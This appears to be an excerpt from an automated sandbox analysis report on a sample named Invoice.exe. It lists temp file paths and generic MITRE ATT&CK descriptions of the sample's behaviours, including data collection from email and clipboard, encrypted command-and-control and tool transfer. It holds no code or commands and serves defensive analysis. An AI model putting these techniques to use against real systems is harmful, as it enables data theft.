C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sxbgljiu.ocj.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wmrawgil.3tt.psm1

C:\Users\user\AppData\Local\Temp\tmp21D.tmp

Windows Analysis Report
Invoice.exe

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre